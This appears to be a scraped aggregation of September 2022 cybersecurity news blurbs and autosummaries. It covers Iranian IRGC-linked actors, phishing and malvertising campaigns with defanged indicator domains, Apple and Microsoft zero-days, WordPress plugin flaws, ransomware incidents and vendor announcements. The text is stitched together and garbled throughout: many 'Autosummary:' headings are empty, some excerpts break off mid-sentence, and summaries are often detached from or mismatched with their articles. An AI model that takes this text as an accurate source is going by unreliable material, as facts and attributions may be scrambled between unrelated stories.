" The IRGC-affiliated group is comprised of employees and associates of Iran-based Najee Technology Hooshmand Fater LLC (Najee Technology) and Afkar System Yazd Company (Afkar System): Mansour Ahmadi: the owner, managing director, and chairman of the board of Najee Technology Ahmad Khatibi Aghda: managing director and member of the board of Afkar System Additional employees and associates: Ali Agha-Ahmadi, Mohammad Agha Ahmadi, Mo"in Mahdavi, Aliakbar Rashidi-Barjini, Amir Hossein Nikaeen Ravari, Mostafa Haji Hosseini, Mojtaba Haji Hosseini, and Mohammad Shakeri-Ashtijeh. "Autosummary:
Notice about tax return on the fake portal (Cyble) The emails contain links that point to multiple phishing URLs impersonating the Greek government tax portal, like “govgr-tax[.]me/ret/tax,”, “govgreece-tax[.]me”, and “mygov-refund[.]me/ret/tax”. "Autosummary:
Today, modern IoT systems include a combination of the following: Wireless networks – Wireless networks are the connectivity platform for IoT systems and enable IoT smart devices and sensors to be placed anywhere wireless networks can reach Cloud or private data center database locations – Cloud or private data center database locations store the mass of information and telemetry data generated, captured, and communicated by the IoT device Hardware sensors – Hardware sensors collect data from a wide range of systems depending on the device, the use case, and other aspects Smart devices – Smart devices are traditionally "dumb" devices that perform various tasks that now have embedded intelligent sensors and now have the capability to connect to wireless networks for transmitting the data collected Compute engines – Compute engines serve the purpose of analyzing and providing intelligent insights from the raw data collected from IoT devices and hardware sensors IoT security implications While IoT is an amazingly powerful technology that organizations can benefit from, businesses do well to consider the security implications of IoT as this relates to their overall security posture. Businesses realize the benefits and value coming from IoT devices, including: Businesses can improve productivity and efficiency with the insights gained from IoT-connected devices Companies can collect data-driven insights to help make businesses decisions It helps businesses realize the full potential of their revenue streams and develop new revenue models It allows easily connecting the physical world with the digital world, which helps to drive innovation, agility, efficiency, and new understandings of data models IoT devices work hand-in-hand with modern machine-learning algorithms allowing the mass of collected data to be analyzed very quickly, allowing businesses to extrapolate intelligent business insights. In general, IoT refers to devices with embedded software, sensors, network connectivity, and other technologies, allowing them to exchange data with other devices connected to the Internet. Internet of Things (IoT) devices are connecting the physical world with the digital With the prevalence of broadband network connectivity, wireless networks, and now 5G mobile networks in remote locations, it is now possible to connect any device to the network, including IoT devices. "Autosummary:
On both Windows and Linux, the malware uses the same five threads, executed simultaneously, for specific tasks: [StageClient::ThreadNetworkReverse] - fetching proxy configurations for alternate connections to the command and control (C2) server [StageClient::ThreadHeartDetect] - close connection to C2 server when commands are not received in the specified time [StageClient::ThreadPollingDriven] - send heartbeat commands to C2 server if there is no info to deliver [StageClient::ThreadBizMsgSend] - check for data to be sent in message queues for all other threads and process it [StageClient::ThreadBizMsgHandler] - check for pending messages from the C2 server ESET researchers also found that both Linux and Windows variants for SideWalk had the same payload delivered through the dead-drop resolver string hosted in a Google Docs file. "Actions to take today to protect against ransom operations:
• Keep systems and software updated and prioritize remediating known exploited vulnerabilities.
• Enforce MFA.
• Make offline backups of your data.
This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) - Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as "the authoring agencies."
This advisory updates joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.
Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report
Autosummary:
Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). "Autosummary:
"Autosummary:
"Autosummary:
Chinese computer manufacturer Lenovo has issued a security advisory to warn of several high-severity BIOS vulnerabilities impacting hundreds of devices in the various models (Desktop, All in One, IdeaCentre, Legion, ThinkCentre, ThinkPad, ThinkAgile, ThinkStation, ThinkSystem). "CISA added more security flaws to its Known Exploited Vulnerabilities Catalog, including Windows and iOS flaws. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 2 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, a Windows privilege escalation vulnerability, tracked as CVE-2022-37969, and an arbitrary code execution issue, tracked as CVE-2022-32917, affecting iPhones and Macs. According to Binding […]
The post CISA added 2 more security flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: Business Cybercriminals are more likely to target small-and-medium businesses for their perceived (and sometimes actual) lack of cyberdefenses. In this post, we break down five must-have technologies that help prevent cyberattacks for SMBs. |
The post 5 technologies that help prevent cyberattacks for SMBs appeared first on Malwarebytes Labs.
"Autosummary:
Through a combination of web protection, application hardening, and more, EP provides businesses with full attack chain protection against both known and unknown malware, ransomware, and zero-hour threats.To that end, the following are strongly recommended: Endpoint protection, VPM, DNS filtering, cloud storage scanning, and 2FA (and cyber insurance!).However, businesses use multiple different cloud storage repositories, and due to lack of integration options, they are unable to get a centralized view of all of their scan results, across multiple repositories, in a single pane of glass. To better prevent cyberattacks, look for a cloud scanning service that uses multiple anti-malware engines, using a combination of signatures, heuristics and machine learning to increase detection rates. This article focuses on helping to prevent cyberattacks purely through technology; though of course, businesses need a combination of technology, people, and strategy to truly become cyber resilient. What’s important to note here is that, because the risk level of every organization is different, there"s no “one-size-fits-all” approach to prevent cyberattacks. "Categories: News Tags: CVE-2022-37969 Tags: CVE-2022-23960 Tags: CVE-2022-35805 Tags: CVE-2022-34700 Tags: CVE-2022-34718 Tags: CVE-2022-34721 Tags: CVE-2022-34722 Tags: Microsoft Tags: Adobe Tags: Android Tags: Apple Tags: Cisco Tags: Google Tags: Samsung Tags: SAP Tags: VMWare The September 2022 Patch Tuesday updates includes two zero-day vulnerabilities, one of which is known to be used in attacks |
The post Update now! Microsoft patches two zero-days appeared first on Malwarebytes Labs.
"Autosummary:
Posted: September 14, 2022 by The September 2022 Patch Tuesday updates includes two zero-day vulnerabilities, one of which is known to be used in attacks The Microsoft September 2022 Patch Tuesday includes fixes for two publicly disclosed zero-day vulnerabilities, one of which is known to be actively exploited. Zero-days The first zero-day, CVE-2022-37969, is a Windows Common Log File System Driver Elevation of Privilege (EoP) vulnerability. "Categories: News Tags: WPGateway Tags: WordPress Tags: plugin Tags: vulnerability Tags: CVE We take a look at a vulnerability being exploited in the wild related to the WPGateway WordPress plugin. |
The post WPGateway WordPress plugin vulnerability could allow full site takeover appeared first on Malwarebytes Labs.
"Autosummary:
Detecting and avoiding compromise Options are limited, but for now the main advice from Wordfence is this: Remove the plugin installation until a patch is made available. "Forescout Technologies and First Health Advisory partnership creates an approach to connected asset risk management by automating the technical data collection, mitigation and risk reduction measures for a healthcare organization’s entire network that encompasses IT, IoT, OT, and IoMT assets. Healthcare organizations’ networks are under constant attack and often do not have the necessary human capital to oversee the work necessary to thwart a potential threat or attack through quick response. This challenge places added … More
The post Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Once accessed, the illicit "Sniffies" copycat domains do one of the following things: Push the user to install dubious Chrome extensions Launch the "Music" App on Apple devices right from the web browser Lead the users to bogus technical "support" scam sites Lead the users to fake job posting sites In tests by BleepingComputer, one such typosquatting domain sniiffies.com, for example, was seen performing one of the above tasks at random. "We uncovered a campaign on the Microsoft Edge home page where malicious ads are luring victims into tech support scams. |
The post Malvertising on Microsoft Edge"s News Feed pushes tech support scams appeared first on Malwarebytes Labs.
"Autosummary:
Infrastructure The advertisements displayed on the Edge News Feed are linked with the following domains (this list is not exhaustive): feedsonbudget[.]com financialtrending[.]com foddylearn[.]com glamorousfeeds[.]com globalnews[.]cloud hardwarecloseout[.]com humaantouch[.]com mainlytrendy[.]com manbrandsonline[.]com polussuo[.]com newsagent[.]quest newsforward[.]quest puppyandcats[.]online thespeedoflite[.]com tissatweb[.]us trendingonfeed[.]com viralonspot[.]com weeklylive[.]info everyavenuetravel[.]site One of the domains,tissatweb[.]us, which was also publicly reported for hosting a browser locker has interesting whois data: "HYCU has announced its State of Ransomware Preparedness report in partnership with ActualTech Media, which reveals that ransomware is an unavoidable risk for businesses, which is why ransomware preparedness is a top priority. The report captures detailed data intended to help technology, financial and security leaders better prepare for and remediate ransomware attacks, which occur on average every 11 seconds and have risen to more than 236.1 million in the first half of 2022. “Survey … More
The post How prepared are organizations to tackle ransomware attacks? appeared first on Help Net Security.
"Autosummary:
According to the report, 63% of surveyed enterprise organizations are increasing spending on detection, prevention and recovery, and respondents are beginning to understand that air-gapped or immutable backups are the only ways to ensure that the backups themselves don’t fall prey to encryption worms when ransomware hits. "Apple has fixed a slew of vulnerabilities in macOS, iOS, and iPadOS, including a zero-day kernel vulnerability (CVE-2022-32917) exploited by attackers in the wild. About CVE-2022-32917 CVE-2022-32917, reported by an anonymous researcher, may allow a malicious application to execute arbitrary code with kernel privileges. “Apple is aware of a report that this issue may have been actively exploited,” the company said, and noted that the vulnerability has been remediated with improved bounds checks. The vulnerability … More
The post Apple fixes actively exploited zero-day in macOS, iOS (CVE-2022-32917) appeared first on Help Net Security.
"Autosummary:
"Barracuda released its fourth-annual threat research report which looks at ransomware attack patterns that occurred between August 2021 and July 2022. This Help Net Security video highlights how ransomware attacks continue to be a threat to businesses of all sizes.
The post A closer look at ransomware attack patterns appeared first on Help Net Security.
"Autosummary:
"Autosummary:
An application may be able to execute arbitrary code with kernel privileges CVE-2022-32893 (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution (WebKit) - Processing maliciously crafted web content may lead to arbitrary code execution CVE-2022-32894 (Kernel) - "The hacktivist collective GhostSec claimed to have compromised 55 Berghof PLCs used by Israeli organizations. Pro-Palestinian Hacking Group GhostSec claimed to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a Free Palestine campaign. On September, 4th, 2022, GhostSec announced on social media and its Telegram channel that it has compromised […]
The post Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel appeared first on Security Affairs.
"Autosummary:
“In the message it published, GhostSec attached a video demonstrating a successful log-in to the PLC’s admin panel, together with an image of an HMI screen showing its current state and control of the PLC process, and another image showing that the PLC had been stopped. "U.S. moving and storage rental company U-Haul has suffered a data breach due to an unauthorized person having accessed an unspecified number of rental contracts, U-Haul’s parent company Amerco has revealed in a last week. It is not known have many customers have been affected, but apparently their payment card information is safe – the person had access “only” to customers’ name, driver’s license (and the information included on it, e.g., physical address and date … More
The post U-Haul reports data breach, customers’ info exposed appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The intrusion also made use of an 11-year-old version of Bitdefender Crash Handler ("javac.exe") to launch a renamed version of Mimikatz ("calc.exe"), an open source Golang penetration testing framework called LadonGo, and other custom payloads on multiple hosts. "Autosummary:
Authentication bypass bug also fixed today Today, Trend Micro addressed another high severity vulnerability in the Apex One product (CVE-2022-40144), allowing potential attackers to bypass authentication by falsifying request parameters on affected installations. "Autosummary:
The current campaign appears to be almost exclusively focused on government or public entities in Asia, including: Head of government/Prime Minister"s office Government institutions linked to finance Government-owned aerospace and defense companies State-owned telecoms companies State-owned IT organizations State-owned media companies 2022 attack chain Symantec presents an example of an attack that unfolded in April 2022 to showcase how the espionage group compromises its government targets. "Trend Micro addressed multiple vulnerabilities in its Apex One endpoint security product, including actively exploited zero-day flaws. Trend Micro announced this week the release of security patches to address multiple vulnerabilities in its Apex One endpoint security product, including a zero-day vulnerability, tracked as CVE-2022-40139 (CVSS 3.0 SCORE 7.2), which is actively exploited. The CVE-2022-40139 […]
The post Trend Micro addresses actively exploited Apex One zero-day appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Autosummary:
"September 2022 Patch Tuesday is here, with fixes for 64 CVE-numbered vulnerabilities in various Microsoft products, including one zero-day (CVE-2022-37969) exploited by attackers. About CVE-2022-37969 CVE-2022-37969 is an elevation of privilege vulnerability in the Windows Common Log File System (CLFS) Driver, and an attacker must already have access and the ability to run code on the target system (e.g., by exploiting another vulnerability or through social engineering) before trying to trigger it. “Post-exploitation flaws such … More
The post Microsoft fixes exploited zero-day in the Windows CLFS Driver (CVE-2022-37969) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Timeline of the third MPI attack example (Proofpoint) In all cases, the threat actors used personal email addresses (Gmail, Outlook, AOL, Hotmail) for both the senders and the CCed persons instead of addresses from the impersonated institutions, which is a clear sign of suspicious activity. "Categories: Exploits and vulnerabilities Categories: News Apple has patched an actively-exploited flaw that affects a host of devices and software, including iPhones, Macs, iPads, and iPod touch. |
The post Important update! iPhones, Macs, and more vulnerable to zero-day bug appeared first on Malwarebytes Labs.
"Autosummary:
"Categories: News Tags: BackupBuddy Tags: WordPress Tags: vulnerability Tags: exploit Tags: hack Tags: compromise Tags: update We take a look at a vulnerability in popular WordPress plugin BackupBuddy, and the steps you need to take to fix it. |
The post BackupBuddy WordPress plugin vulnerable to exploitation, update now! appeared first on Malwarebytes Labs.
"Autosummary:
Hijacked sites can be used for SEO poisoning, redirecting to malicious sites, spam, malware installation, phishing, and more. "In this Help Net Security video, Michael Thelander, Director Product Marketing at Eclypsium, discusses how financial organizations are failing to act despite the majority experiencing a firmware-related breach. 92% of CISOs in finance believe adversaries are better equipped at weaponizing firmware than their teams are at securing it, according to Eclypsium and Vanson Bourne. Additionally, three out of four acknowledge gaps in awareness concerning the organization’s firmware blind spot. Consequently, 88% of those surveyed admit … More
The post Financial organizations fail to act on firmware breaches appeared first on Help Net Security.
"Autosummary:
"Results of a Vade report highlight the prevalence of Managed Service Providers (MSPs), with 96% of organizations either currently outsourcing at least some of their needs to MSPs or planning to do so in the future. The report also analyzes the successes and pitfalls of email security solutions and where MSPs may have an opportunity to reach into the market. Conducted by Vanson Bourne, the survey includes findings from interviews of 500 IT decision makers … More
The post MSPs and cybersecurity: The time for turning a blind eye is over appeared first on Help Net Security.
"Autosummary:
Threat monitoring and intrusion (43%), cybersecurity consulting (37%) and firewall management (36%) are the three most important services to them.Threat monitoring and intrusion (43%), cybersecurity consulting (37%) and firewall management (36%) are the three most important services to them. "Autosummary:
"A global research commissioned by Cohesity reveals that nearly half of respondents say their company depends on outdated, legacy backup and recovery infrastructure to manage and protect their data. This Help Net Security video showcases that organizations are still relying on outdated infrastructure to protect their data.
The post Outdated infrastructure remains a problem against sophisticated cyberattacks appeared first on Help Net Security.
"Autosummary:
"Rahul Sasi is the founder and CEO of CloudSEK, which leverages artificial intelligence and machine learning to combat cyber threats. The Singapore-headquartered company was founded in 2015, and raised a $7 million in Series A investment led by MassMutual Ventures in 2021. In this Help Net Security interview, Sasi talks about the challenges of building CloudSEK, his journey in the cybersecurity industry, and discusses lessons learned along the way. What unexpected obstacles did you encounter … More
The post Building a successful cybersecurity business, one client at a time appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Sasi talks about the challenges of building CloudSEK, his journey in the cybersecurity industry, and discusses lessons learned along the way.So, as long as we ensure that all CloudSters are growing and experimenting, at a good pace, CloudSEK will continue to grow.“If you want to go fast, go alone, if you want to go far, go together.” It is also important to nurture and cultivate a culture that fosters consistency, innovation, and experimentation. "Six high-severity firmware bugs affecting several HP Enterprise devices are yet to be patched, some of them since July 2021. The Binarly security research team reported several HP Enterprise devices are affected by six high-severity firmware vulnerabilities that are yet to be patched, and some of them have been disclosed more than a year ago. […]
The post Some firmware bugs in HP business devices are yet to be fixed appeared first on Security Affairs.
"Autosummary:
CVSS score SMM Memory Corruption (Arbitrary Code Execution) BRLY-2022-010 BRLY-2022-011 BRLY-2022-012 BRLY-2022-013 BRLY-2021-046 BRLY-2021-047 CVE-2022-23930 CVE-2022-31644 CVE-2022-31645 CVE-2022-31646 CVE-2022-31640 CVE-2022-31641 8.2 High 7.5 High 8.2 High 8.2 High 7.5 High 7.5 High Three vulnerabilities have been reported to HP in July 2021, while other three issues were disclosed in April 2022. "QNAP Systems has provided more information about the latest DeadBolt ransomware campaign targeting users of its network-attached storage (NAS) devices and the vulnerability the attackers are exploiting (CVE-2022-27593). About CVE-2022-27593 CVE-2022-27593 exists because of an externally controlled reference that resolves to a resource that is outside of the intended control sphere, and affects the widely used Photo Station application. The vulnerability allows attackers to modify system files and, ultimately, install and deploy ransomware. According to … More
The post Thousands of QNAP NAS devices hit by DeadBolt ransomware (CVE-2022-27593) appeared first on Help Net Security.
"Autosummary:
“No public exploit code exists, although this write up will introduce, what we believe to be, the basis of the exploit,” he wrote, and noted that the published information is likely enough to write signatures and detections against its exploitation. "Autosummary:
The attacks against Israeli targets, dubbed "#OpIsrael," is said to have commenced on June 28, 2022, citing "continuous attacks from Israel towards Palestinians. "Autosummary:
Developed by the American Institute of CPAs (AICPA), SOC 2 requires compliance for managing customer data based on five criteria or "trust service principles" - security, availability, processing integrity, confidentiality and privacy.If your business is trying to secure new investment, going through a merger, or being acquired by another business, due diligence will include your security posture, how you handle data, and your exposure to risk and threats. SOC 2-compliant organisations can use this to prove to customers that they"re committed to information security, which in turn can create new business opportunities, because the framework states that compliant organisations can only share data with other organisations that have passed the audit. "Cisco confirmed the May attack and that the data leaked by the Yanluowang ransomware group was stolen from its systems. In August, Cisco disclosed a security breach, the Yanluowang ransomware gang breached its corporate network in late May and stole internal data. The investigation conducted by Cisco Security Incident Response (CSIRT) and Cisco Talos revealed […]
The post Cisco confirms that data leaked by the Yanluowang ransomware gang were stolen from its systems appeared first on Security Affairs.
"Autosummary:
Then threat actors were able to drop multiple tools in the target network, including remote access tools like LogMeIn and TeamViewer, Cobalt Strike, PowerSploit, Mimikatz, and Impacket. "Autosummary:
" This is an important addition to the gang"s arsenal, given that Mitel Voice-over-IP (VoIP) products are used by organizations in critical sectors worldwide (including government agencies), with over 19,000 devices currently exposed to attacks over the Internet, per security expert Kevin Beaumont. "Autosummary:
"Autosummary:
"Apple has addressed the eighth zero-day vulnerability that is actively exploited in attacks against iPhones and Macs since January. Apple has released security updates to fix a zero-day vulnerability, tracked as CVE-2022-32917, which is actively exploited in attacks against iPhone and Mac devices. This is the eighth zero-day vulnerability fixed by the IT giant since […]
The post Apple fixed the eighth actively exploited zero-day this year appeared first on Security Affairs.
"Autosummary:
Apple addressed other sever zero-day since the start of the year: Apple has addressed other six zero-day vulnerabilities since January, below is the list of fixed issues: Follow me on Twitter: @securityaffairs and Facebook Pierluigi Paganini (SecurityAffairs – hacking, zero-day) Share this... "With the resurgence of cyber-attacks, which are ever more violent and paralyzing for companies, IKOULA has joined forces with ESET to offer companies a professional endpoint protection solution against ransomware and zero-day threats. At a time when cyber-risks must be approached in the same way as all other business risks, IKOULA is strengthening its range of cyber-protection solutions, and now offers to its customers the ESET solution: a solution created to protect all company’s workstations … More
The post IKOULA and ESET join forces to block ransomware and zero-day threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
However, many business notebook PCs (Elite, Zbook, ProBook), business desktop PCs (ProDesk, EliteDesk, ProOne), point of sale systems, and also HP workstations (Z1, Z2, Z4, Zcentral) have not received patches yet (check advisory for details). "Albania blamed Iran for a new cyberattack that hit computer systems used by the state police on Friday. Albania blamed the government of Teheran for a new cyberattack that hit computer systems used by the state police on Saturday. “The national police’s computer systems were hit Friday by a cyberattack which, according to initial information, […]
The post Albania was hit by a new cyberattack and blames Iran appeared first on Security Affairs.
"Autosummary:
“The national police’s computer systems were hit Friday by a cyberattack which, according to initial information, was committed by the same actors who in July attacked the country’s public and government service systems,” reads a statement issued by the Albanian interior ministry. “In order to neutralize the criminal act and secure the systems,” the authorities have shut down computer control systems at seaports, airports and border posts, the statement added. "Autosummary:
" Microsoft, which investigated the attacks, said the adversaries worked in tandem to carry out distinct phases of the attacks, with each cluster responsible for a different aspect of the operation - DEV-0842 deployed the ransomware and wiper malware DEV-0861 gained initial access and exfiltrated data DEV-0166 (aka IntrudingDivisor) exfiltrated data, and DEV-0133 (aka Lyceum or Siamese Kitten) probed victim infrastructure The tech giant"s threat intelligence teams also attributed the groups involved in gaining initial access and exfiltrating data to the Iranian MOIS-linked hacking collective codenamed Europium, which is also known as APT34, Cobalt Gypsy, Helix Kitten, or OilRig. "Scammers live-streamed on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it. Cybercriminals were live-streaming on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it. The interview […]
The post Scammers live-streamed on YouTube a fake Apple crypto event appeared first on Security Affairs.
"Autosummary:
“When I first started watching the fake stream, there were around 16K viewers, and right before first publishing this story, that count was nearly 70K.” The Verge also reported having found another live stream on a separate channel, the stream was advertised as an event featuring Cook and Elon Musk about Apple and the metaverse. "InterContinental Hotels Group PLC (IHG) discloses a security breach, parts of its IT infrastructure has been subject to unauthorised activity The hospitality conglomerate, InterContinental Hotel Group (IHG) manages 17 hotel chains, including the Regent, Crowne Plaza, Holiday Inn, and Candlewood Suites. IHG operates 6,028 hotels in more than 100 different countries. The company announced that […]
The post IHG suffered a cyberattack that severely impacted its booking process appeared first on Security Affairs.
"Autosummary:
"China-linked BRONZE PRESIDENT group is targeting government officials in Europe, the Middle East, and South America with PlugX malware. Secureworks researchers reported that China-linked APT group BRONZE PRESIDENT conducted a new campaign aimed at government officials in Europe, the Middle East, and South America with the PlugX malware. Attacks part of this campaign were spotted […]
The post China-Linked BRONZE PRESIDENT APT targets Government officials worldwide appeared first on Security Affairs.
"Autosummary:
“Several characteristics of this campaign indicate that it was conducted by the likely Chinese government-sponsored BRONZE PRESIDENT threat group, including the use of PlugX, file paths and naming schemes previously used by the threat group, the presence of shellcode in executable file headers, and politically-themed decoy documents that align with regions where China has interests.” reads the analysis published by Secureworks. "CyberLink has integrated its AI facial recognition engine, FaceMe, in MediaTek’s new AIoT platform, Genio. The pairing of FaceMe’s engine with the Genio platform gives the market an AI solution for facial recognition AIoT applications. Edge computing for facial recognition with low latency CyberLink’s cross-platform AI facial recognition engine, FaceMe already supports numerous operating systems and is optimized for IoT and AIoT platforms. With the recent MediaTek’s Genio 1200 integration, FaceMe further provides IoT/AIoT developers … More
The post CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps appeared first on Help Net Security.
"Autosummary:
"Autosummary:
PLAY doesn"t give configuration options, but instead, it just breaks the file into 2, 3, or 5 chunks, depending on the file size, and then encrypts every other chunk. "We all know the risks out there. Ransomware is a huge threat, and critical transactional data is constantly under attack. Meanwhile, financial services organizations are being squeezed on all sides, as regulators are tightening legislation, from SOX to CCPA, GDPR and global data privacy laws like PIPL. In this firestorm, it’s never been more important for financial services organizations to level up their data protection and risk mitigation strategies. What makes financial services data so … More
The post Better than a fix: Tightening backup and restore helps financial services companies innovate appeared first on Help Net Security.
"Autosummary:
Amongst the financial services organizations that were hit, 52% paid the ransom to restore data, which is higher than the global average of 46%, and the survey found that the average remediation cost in financial services was US$1.59M, which is above the global average of US$1.4M. Response rates are too slow It follows that securing this data is a huge challenge that requires ever-shifting innovations. Sophisticated data models Strict security requirements Extremely large data volumes Testing environments can introduce risk Financial services under attack Threats to data come from many places, from human error to malicious activity, and one such threat is ransomware attacks. 2. Have a clear archiving strategy, which applies coherent rules that control which data stays in the platform, which moves off-platform, and what gets deleted, all in keeping with your business needs and industry regulation.Meanwhile, financial services organizations are being squeezed on all sides, as regulators are tightening legislation, from SOX to CCPA, GDPR and global data privacy laws like PIPL. "OneSpan has expanded its OneSpan Cloud Authentication service with BankID. BankID first launched with OneSpan in September 2021 and has already reached a multi-million user milestone that is expected to continue growing as BankID’s technology adoption increases. This expanded partnership further solidifies the crucial role BankID has entrusted to OneSpan to provide security and meet compliance standards within the Norwegian critical national infrastructure. Issued through more than 90 banks and 9,000 merchants, including tax authorities, … More
The post OneSpan and BankID expand digital identity protection to allow cross-border authentication with e-ID appeared first on Help Net Security.
"Autosummary:
“The world needs security-infused workflows native to digital experiences, like BankID’s solution, that preserve and enhance the customer experience and guarantee the integrity of people, data, transactions, and documentation,” said OneSpan President and CEO, Matthew Moynahan. "Critical Insight announced the release of the firm’s H1 2022 Healthcare Data Breach Report, which analyzes breach data reported to the United States Department of Health and Human Services by healthcare organizations. This Help Net Security video reveals why attackers are changing targets and moving from large hospitals to smaller hospital systems.
The post Cybercriminals are changing focus from large hospitals to smaller hospital systems appeared first on Help Net Security.
"Autosummary:
"ConnectWise has fixed a vulnerability in ConnectWise Automate, a popular remote monitoring and management tool, which could allow attackers to compromise confidential data or other processing resources. The severity of the vulnerability is merely “important”, as its exploitation requires additional access and/or privilege, but ConnectWise recommends administrators of on-premise instances to patch as soon as possible. The company did not actually say that the vulnerability is being exploited in the wild, but categorizes the priority … More
The post High-risk ConnectWise Automate vulnerability fixed, admins urged to patch ASAP appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Threat actors are exploiting a zero-day vulnerability in a WordPress plugin called BackupBuddy, Wordfence researchers warned. On September 6, 2022, the Wordfence Threat Intelligence team was informed of a vulnerability being actively exploited in the BackupBuddy WordPress plugin. This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and […]
The post Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin appeared first on Security Affairs.
"Autosummary:
This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and media files. "Autosummary:
The gang has claimed attacks on other school districts, schools, and universities worldwide, including the Austrian Medical University of Innsbruck, the San Luis Coastal Unified School District, the Moon Area School District, the Grand Valley State University, and many others. "Autosummary:
More recently, in March 2022, Cyware reported an uptick in the trojan"s distribution, identifying a hostname link to Bazaar and LockBit operations. "Autosummary:
We also saw some new ransomware research released this week: Contributors and those who provided new ransomware information and stories this week include: @malwareforme, @LawrenceAbrams, @FourOctets, @Ionut_Ilascu, @serghei, @billtoulas, @fwosar, @VK_Intel, @struppigel, @BleepinComputer, @malwrhunterteam, @Seifreed, @DanielGallagher, @demonslay335, @jorntvdw, @PolarToffee, @MsftSecIntel, @CISAgov, @FBI, @pmbureau, @AdvIntel, @pcrisk, @PogoWasRight, @cPeterr, @security_score, and @Intel471Inc.Ransomware gangs have been busy this week, launching attacks against NAS devices, one of the largest hotel groups, IHG, and LAUSD, the second largest school district in the USA. "Autosummary:
https://t.co/JoH2cEqNzp — Jens Stoltenberg (@jensstoltenberg) September 8, 2022 MOIS-controlled threat groups Earlier this year, U.S. Cyber Command (USCYBERCOM) officially linked the Iranian-backed MuddyWatter threat group to Iran"s Ministry of Intelligence and Security (MOIS). "The U.S. Treasury Department sanctioned Iran ‘s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the Albania cyberattack. The U.S. Treasury Department announced sanctions against Iran ‘s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the cyber attack that hit Albania in July. MOIS is the primary intelligence […]
The post US Treasury sanctioned Iran ’s Ministry of Intelligence over Albania cyberattack appeared first on Security Affairs.
"Autosummary:
Error. "In July 2022, one third of all malware downloads came from cloud apps. The overwhelming majority of the downloads were trojans, a type of malware that is disguised as legitimate software. If you were to download and run a trojan, you would typically end up infected with other malware such as info stealers, backdoors or ransomware. Attackers are successful using cloud apps to deliver malware because cloud apps are so popular. In this video for … More
The post The top apps for malware downloads appeared first on Help Net Security.
"Autosummary:
"Zerify announced the findings of a survey that indicate that IT professionals are becoming increasingly concerned about the growing number of cyber threats and foreign attacks capable of impacting video conferencing. The survey, executed by Propeller Insights in July of 2022, involved 1,000 IT professionals – most of whom are at the director or C-Level (83.8%). With the White House’s executive order on improving the nation’s cybersecurity, video conferencing still has not been given the … More
The post Nation-state attacks are a growing threat to video conferencing appeared first on Help Net Security.
"Autosummary:
Nation-state cyber threats have increased at most (81.8%) companies 89% of IT professionals are concerned about foreign attacks as they see a rise in threats 79% of respondents reported that they were very knowledgeable about the concept and framework of zero trust cybersecurity, with 86% stating that their company had zero trust cybersecurity policies. "Autosummary:
"Autosummary:
"Autosummary:
"Some members of the Conti ransomware gang were involved in financially motivated attacks targeting Ukraine from April to August 2022. Researchers from Google’s Threat Analysis Group (TAG) reported that some former members of the Conti cybercrime group were involved in five different campaigns targeting Ukraine between April and August 2022. The activities overlap with operations […]
The post Ex-members of the Conti ransomware gang target Ukraine appeared first on Security Affairs.
"Autosummary:
“UAC-0098 activities are representative examples of blurring lines between financially motivated and government backed groups in Eastern Europe, illustrating a trend of threat actors changing their targeting to align with regional geopolitical interests.” concludes TAG. "Autosummary:
This diversification in attacks is illustrated in the Lazarus hacker"s wide range of attacks, including their targeting of IT job seekers, the creation of fake cryptocurrency trading apps, the creation of trojanized development tools, the use of ransomware as decoys, and the massive $620 million theft of cryptocurrency theft from the Ronin bridge. "Autosummary:
As well as strongly discouraging victims from paying any ransom to Vice Society, the FBI is also urging victims to share information that might help disrupt or even dismantle the criminal group: “The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.” "Autosummary:
